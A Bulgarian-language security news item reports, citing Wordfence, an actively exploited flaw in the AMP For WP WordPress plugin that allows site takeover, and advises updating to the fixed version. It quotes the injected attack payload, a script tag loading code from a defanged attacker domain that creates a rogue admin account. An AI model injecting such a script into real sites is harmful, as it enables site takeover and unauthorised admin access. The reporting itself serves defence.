КибератакиУязивмости, експлойти, ъпдейти

Уязвимост в AMP For WP се експлоатира и позволява превземане на сайтове

Плъгинът е инсталиран на поне 100 хил. сайта, работещи на WordPress

Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>

Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

„Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.

Как да се предпазите

Уязвимостта е отстранена във версия 0.9.97.20 на плъгина. Ако сайтът ви използва AMP For WP, обновете го до най-новата налична версия.

Покажи още
Back to top button